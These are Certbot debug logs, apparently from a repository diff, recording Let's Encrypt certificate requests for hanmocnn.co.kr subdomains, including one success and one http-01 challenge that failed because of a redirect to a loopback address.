2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
2026-02-14 23:36:38,640:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 23:36:38,640:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
2026-02-14 23:36:38,640:DEBUG:certbot.configuration:Var webroot_map={'mail.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
2026-02-14 23:36:38,642:DEBUG:certbot._internal.display.obj:Notifying user:
Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/npm-4/fullchain.pem
Key is saved at: /etc/letsencrypt/live/npm-4/privkey.pem
This certificate expires on 2026-05-15.
These files will be updated when the certificate renews.
2026-02-14 23:36:38,642:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
2026-02-14 23:36:38,643:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
2026-02-14 23:36:38,646:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
* Donating to EFF: https://eff.org/donate-le

View File

@@ -1,361 +0,0 @@
2026-02-14 23:30:10,216:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-3', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'mail.hanmocnn.co.kr']
2026-02-14 23:30:10,217:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-14 23:30:10,231:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-14 23:30:10,232:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 23:30:10,232:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffaf0747d0>
Prep: True
2026-02-14 23:30:10,233:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffaf0747d0> and installer None
2026-02-14 23:30:10,233:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
2026-02-14 23:30:10,466:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-14 23:30:10,467:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-14 23:30:10,469:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-14 23:30:11,033:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-14 23:30:11,033:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:30:10 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"IeJ13iSSbJU": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-14 23:30:11,035:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for mail.hanmocnn.co.kr
2026-02-14 23:30:11,039:DEBUG:acme.client:Requesting fresh nonce
2026-02-14 23:30:11,039:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-14 23:30:11,211:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-14 23:30:11,212:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:30:11 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfwLnIKGWlrRhhVfFAZpsV16w9Uf3Rz5_svuQFLXZkr1c
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-14 23:30:11,212:DEBUG:acme.client:Storing nonce: QkEzerAfwLnIKGWlrRhhVfFAZpsV16w9Uf3Rz5_svuQFLXZkr1c
2026-02-14 23:30:11,212:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "mail.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-14 23:30:11,218:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZndMbklLR1dsclJoaFZmRkFacHNWMTZ3OVVmM1J6NV9zdnVRRkxYWmtyMWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "hUNh8dxNA5BF8icGPOEHmCPfJtyawCVJzqBeUIeEzsqfaKt8EjEL3baKo7zfOirYzp4cx4fwycJJpLYufSd76FU5VIC4kh97NG_pSWbIyn80j9NuXk5HwNLVE4iKRkI7_pP-IOcnoy69XJm8InQbyLJOHu63pbQ8lQBYi30aPXXswlYRv_ow-qXKI8MeA3kw6eImqd2c77ZqL-ixnJNxHOQGqAbaxy3RYiwdM9PI9_duw8DHOD7poKQNf0gHP2TZJ8rx3GL5tNZFi748tENlGKtQDHgYgv-80hLu5h1Ij7UjCKBIgUmyAtnETmPnoLSSIYGg26_v2gHgBKyB09R2EQ",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm1haWwuaGFubW9jbm4uY28ua3IiCiAgICB9CiAgXQp9"
}
2026-02-14 23:30:11,498:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 353
2026-02-14 23:30:11,499:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sat, 14 Feb 2026 23:30:11 GMT
Content-Type: application/json
Content-Length: 353
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480369106906
Replay-Nonce: QkEzerAf_AMAs5rp4OhuwCMv__bv8YNGZsyN5ulZLrYp-QHuOV8
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "pending",
"expires": "2026-02-21T23:30:11Z",
"identifiers": [
{
"type": "dns",
"value": "mail.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480369106906"
}
2026-02-14 23:30:11,500:DEBUG:acme.client:Storing nonce: QkEzerAf_AMAs5rp4OhuwCMv__bv8YNGZsyN5ulZLrYp-QHuOV8
2026-02-14 23:30:11,500:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:30:11,505:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZl9BTUFzNXJwNE9odXdDTXZfX2J2OFlOR1pzeU41dWxaTHJZcC1RSHVPVjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0",
"signature": "u7GAisVQzkIqT5g7zSAC1_FkoVVmScpwW6Q12gDpSPi9lgnK7kq_MxapWY1FvmjQmW9piUvgi8DFfP8VcPARI-L9RpYhe8znFu_4Tw0Y_Erlqt5WrlYTg8_78Af64hbrqcvL3wlgtENkSeWP-Gj7vFAwnw_auW2ZEAWvMbRIkN49BgScBAtP7Du8ivqPmKhSaL3FJPjGFpUbqLM1i2n8LvMTsi5d4wkHP3QjV28owu3Js2X7ueG_wcYA0I1kM_-LCwhd6iiAd2qmtDM67zUS_Bcy_M0jrlQk0nMW8taxle80hGYHKb7gYVVmpastOSmnVIKtbOiqG10TGNp9T-Qr3Q",
"payload": ""
}
2026-02-14 23:30:11,692:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 827
2026-02-14 23:30:11,693:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:30:11 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfdangirSe2YPrGQijk5nJQFNXPlGCS3W1xymb8N4x3mM
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:30:11Z",
"challenges": [
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/Xat64Q",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
}
]
}
2026-02-14 23:30:11,693:DEBUG:acme.client:Storing nonce: QkEzerAfdangirSe2YPrGQijk5nJQFNXPlGCS3W1xymb8N4x3mM
2026-02-14 23:30:11,694:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg', 'status': 'pending', 'token': 'RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA'}
2026-02-14 23:30:11,694:INFO:certbot._internal.auth_handler:Performing the following challenges:
2026-02-14 23:30:11,694:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr')
2026-02-14 23:30:11,695:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
2026-02-14 23:30:11,695:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
2026-02-14 23:30:11,696:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA
2026-02-14 23:30:11,697:DEBUG:acme.client:JWS payload:
b'{}'
2026-02-14 23:30:11,701:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmRhbmdpclNlMllQckdRaWprNW5KUUZOWFBsR0NTM1cxeHltYjhONHgzbU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzgyODA0MDk2L1ZILUx1USJ9",
"signature": "UI4HqG8aIkUIiLRWJtRIc8wDV009hQbsVzlB8xw5-6f5Z1hniXCcTAxR1g--rstxXvbUc8JwKKzP5a1P9KqrFPQqkU8tcMgMAQdLnouHVJ4WqlF4gbT1Oho55kFYktJcknxwXtH1Na8oRdrMl58cPuZV46gCiCjA5jQyVLuaAo7UHFK23npRg4vUSsuJXmzEXiE_ak0K9LauVMSqOy8D5ccG8dxYYVUl3CwQ8JzTnUkk0oMBjX_twlf8tmWNxfqadc-xGyEQZPoykNJfZtoL_1pT40QGohUB5Bvd5fLlAwt9LMN8FhpqLh4axSdH0sXNrDtJDqVTPdABojASfUg5FQ",
"payload": "e30"
}
2026-02-14 23:30:11,879:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658782804096/VH-LuQ HTTP/1.1" 200 195
2026-02-14 23:30:11,880:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:30:11 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096>;rel="up"
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ
Replay-Nonce: QkEzerAfwS0GHOuh0p5oZ0dX2-h1cdvkUmzcj3UERL2eyB6TIs0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
}
2026-02-14 23:30:11,880:DEBUG:acme.client:Storing nonce: QkEzerAfwS0GHOuh0p5oZ0dX2-h1cdvkUmzcj3UERL2eyB6TIs0
2026-02-14 23:30:11,880:INFO:certbot._internal.auth_handler:Waiting for verification...
2026-02-14 23:30:12,881:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:30:12,886:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZndTMEdIT3VoMHA1b1owZFgyLWgxY2R2a1VtemNqM1VFUkwyZXlCNlRJczAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0",
"signature": "Zyy-7On6I9OdwGJpo2gHLS2PkXfFYhqYyZ-6RBwPSYT4asuCiGrlDs8Zf5hfClpQUCuL9gPUZJyBBsMrfcELAyc-1Mhs-0Y60R5JxzDJM_Oe64ii_fNtOk5RhMNvhhtHL6wOpVPgqJbu6NOD1LoEwZnI95or3cQrnA5JLgXlFIH4e627oXP9FzadbEnE2ppHSHEOE-e8tJf2brEtX3hpppUW0pvvQ5TXOXk5Hzb4GelRYRgtPtJ1h-akA8imuF1_ToaZ9hme9x8dOFwITbS69CvNXLbFCZZMpVy6ABebZmIdueP96v6yOurRMhiU6sSwsm2aqY4m-hzAeXDy7QYYIQ",
"payload": ""
}
2026-02-14 23:30:13,060:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 827
2026-02-14 23:30:13,061:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:30:12 GMT
Content-Type: application/json
Content-Length: 827
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfFYA0_fEXrf2D_r6CSK-4QmrHn-QLIJngeuotvq0WOCA
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:30:11Z",
"challenges": [
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/Xat64Q",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
"status": "pending",
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
}
]
}
2026-02-14 23:30:13,061:DEBUG:acme.client:Storing nonce: QkEzerAfFYA0_fEXrf2D_r6CSK-4QmrHn-QLIJngeuotvq0WOCA
2026-02-14 23:30:13,062:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg', 'status': 'pending', 'token': 'RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA'}
2026-02-14 23:30:16,062:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:30:16,067:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZkZZQTBfZkVYcmYyRF9yNkNTSy00UW1ySG4tUUxJSm5nZXVvdHZxMFdPQ0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0",
"signature": "gzMSYR18ejGBOZMJuA6MIORDbmiGpx9s4x0SWUt-BiFracrk8MfKiEwQOk3cRTyvIRHxi6RQlTjsL1AB68tDcBBnjjjGwHEfbB4VB_OiMR--W36m2ryAFlgK_RhFbSBme2YhlvrY2wwXDbXLGi50IS0LPytBMNSAwnjbrdv1ivOTe9ghkUB0nhhTQhMRH-ZtyCrjR9y79JOpOFlMoQ_BtUtA6GcGhbGt14R5W-YCDCHz8XR44MddbE0Pg9QfoEkPYtLID5X_MAqtLyzvP6NegFkDnoO_vGzzVBT1sqQBZ1IWBoxVFY-B8KvO9IE6j87PKo5Zya61nKP2WhSCKpurMQ",
"payload": ""
}
2026-02-14 23:30:16,242:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 1062
2026-02-14 23:30:16,243:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:30:16 GMT
Content-Type: application/json
Content-Length: 1062
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfYJSp6SSecxA1fczj1GIvYcegdMBqoPT9DzT4CCKVwMA
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "invalid",
"expires": "2026-02-21T23:30:11Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
"status": "invalid",
"validated": "2026-02-14T23:30:11Z",
"error": {
"type": "urn:ietf:params:acme:error:connection",
"detail": "211.49.97.59: Fetching http://127.0.0.1: Invalid host in redirect target: IP address is in a reserved address block: [RFC1122], Section 3.2.1.3: Loopback",
"status": 400
},
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA",
"validationRecord": [
{
"url": "http://mail.hanmocnn.co.kr/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA",
"hostname": "mail.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"211.49.97.59"
],
"addressUsed": "211.49.97.59"
}
]
}
]
}
2026-02-14 23:30:16,243:DEBUG:acme.client:Storing nonce: qLPTsdtfYJSp6SSecxA1fczj1GIvYcegdMBqoPT9DzT4CCKVwMA
2026-02-14 23:30:16,243:INFO:certbot._internal.auth_handler:Challenge failed for domain mail.hanmocnn.co.kr
2026-02-14 23:30:16,243:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr')
2026-02-14 23:30:16,243:DEBUG:certbot._internal.display.obj:Notifying user:
Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems:
Identifier: mail.hanmocnn.co.kr
Type: connection
Detail: 211.49.97.59: Fetching http://127.0.0.1: Invalid host in redirect target: IP address is in a reserved address block: [RFC1122], Section 3.2.1.3: Loopback
Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet.
2026-02-14 23:30:16,244:DEBUG:certbot._internal.error_handler:Encountered exception:
Traceback (most recent call last):
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
raise errors.AuthorizationError('Some challenges have failed.')
certbot.errors.AuthorizationError: Some challenges have failed.
2026-02-14 23:30:16,245:DEBUG:certbot._internal.error_handler:Calling registered functions
2026-02-14 23:30:16,245:INFO:certbot._internal.auth_handler:Cleaning up challenges
2026-02-14 23:30:16,245:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA
2026-02-14 23:30:16,245:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
2026-02-14 23:30:16,246:DEBUG:certbot._internal.log:Exiting abnormally:
Traceback (most recent call last):
File "/opt/certbot/bin/certbot", line 6, in <module>
sys.exit(main())
^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main
return internal_main.main(cli_args)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1886, in main
return config.func(config, plugins)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1598, in certonly
lineage = _get_and_save_cert(le_client, config, sans, certname, lineage)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 143, in _get_and_save_cert
lineage = le_client.obtain_and_enroll_certificate(sans, certname)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 533, in obtain_and_enroll_certificate
cert, chain, key, _ = self.obtain_certificate(sans)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 434, in obtain_certificate
orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 512, in _get_order_and_authorizations
authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
raise errors.AuthorizationError('Some challenges have failed.')
certbot.errors.AuthorizationError: Some challenges have failed.
2026-02-14 23:30:16,248:ERROR:certbot._internal.log:Some challenges have failed.

View File

@@ -1,608 +0,0 @@
2026-02-14 22:59:02,196:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-2', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'asset.hanmocnn.co.kr']
2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-14 22:59:02,211:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-14 22:59:02,212:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 22:59:02,213:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffff82545850>
Prep: True
2026-02-14 22:59:02,213:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffff82545850> and installer None
2026-02-14 22:59:02,213:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
